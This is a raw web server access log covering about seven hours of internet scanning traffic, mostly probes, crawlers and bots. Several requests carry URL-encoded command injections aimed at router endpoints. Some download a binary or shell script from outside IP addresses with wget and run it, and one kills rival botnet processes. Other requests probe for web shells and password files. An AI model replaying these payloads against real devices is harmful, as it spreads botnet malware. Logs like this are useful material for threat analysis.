[30/Jun/2024:18:46:16 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 45.148.10.174 - - [30/Jun/2024:19:23:03 +0200] "POST /cmd,/simZysh/register_main/setCookie HTTP/1.1" 404 381 "-" "Go-http-client/1.1" 45.156.129.46 - - [30/Jun/2024:19:32:55 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 170.64.171.135 - - [30/Jun/2024:19:36:03 +0200] "\x16\x03\x01" 400 383 "-" "-" 170.64.171.135 - - [30/Jun/2024:19:36:04 +0200] "\x16\x03\x01" 400 383 "-" "-" 170.64.171.135 - - [30/Jun/2024:19:36:04 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 170.64.171.135 - - [30/Jun/2024:19:36:05 +0200] "GET /form.html HTTP/1.1" 404 283 "-" "curl/8.1.2" 170.64.171.135 - - [30/Jun/2024:19:36:05 +0200] "GET /upl.php HTTP/1.1" 404 282 "-" "Mozilla/5.0" 170.64.171.135 - - [30/Jun/2024:19:36:06 +0200] "\x16\x03\x01" 400 383 "-" "-" 170.64.171.135 - - [30/Jun/2024:19:36:07 +0200] "GET /geoip/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 170.64.171.135 - - [30/Jun/2024:19:36:07 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 170.64.171.135 - - [30/Jun/2024:19:36:08 +0200] "GET /1.php HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 170.64.171.135 - - [30/Jun/2024:19:36:08 +0200] "GET /bundle.js HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 170.64.171.135 - - [30/Jun/2024:19:36:09 +0200] "GET /files/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 170.64.171.135 - - [30/Jun/2024:19:36:10 +0200] "GET /systembc/password.php HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 170.64.171.135 - - [30/Jun/2024:19:36:10 +0200] "GET /password.php HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 170.64.171.135 - - [30/Jun/2024:19:36:11 +0200] "GET /info.php HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 66.249.64.32 - - [30/Jun/2024:20:14:17 +0200] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.64.32 - - [30/Jun/2024:20:14:17 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.175 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 46.174.191.29 - - [30/Jun/2024:20:48:04 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" 34.78.249.41 - - [30/Jun/2024:20:56:54 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.2" 90.178.9.229 - - [30/Jun/2024:21:16:28 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 80.82.77.202 - - [30/Jun/2024:21:23:12 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Safari/537.36" 141.98.83.197 - - [30/Jun/2024:21:30:12 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 141.98.83.197 - - [30/Jun/2024:21:30:12 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 199.45.154.128 - - [30/Jun/2024:21:57:53 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 199.45.154.128 - - [30/Jun/2024:21:57:59 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 199.45.154.128 - - [30/Jun/2024:21:58:01 +0200] "PRI * HTTP/2.0" 400 383 "-" "-" 199.45.154.128 - - [30/Jun/2024:21:58:02 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 199.45.154.128 - - [30/Jun/2024:21:58:03 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 185.224.128.43 - - [30/Jun/2024:22:05:13 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 185.206.167.193 - - [30/Jun/2024:23:17:17 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36" 51.8.71.146 - - [01/Jul/2024:00:03:18 +0200] "MGLNDD_212.69.160.11_80" 400 383 "-" "-" 37.139.5.66 - - [01/Jul/2024:00:12:16 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "linus-torvalds-loves-you" 149.50.103.48 - - [01/Jul/2024:00:21:11 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 83.97.73.245 - - [01/Jul/2024:00:29:30 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 36.65.126.193 - - [01/Jul/2024:00:57:47 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 120.84.12.100 - - [01/Jul/2024:01:09:30 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 141.98.83.197 - - [01/Jul/2024:01:40:06 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 141.98.83.197 - - [01/Jul/2024:01:40:07 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"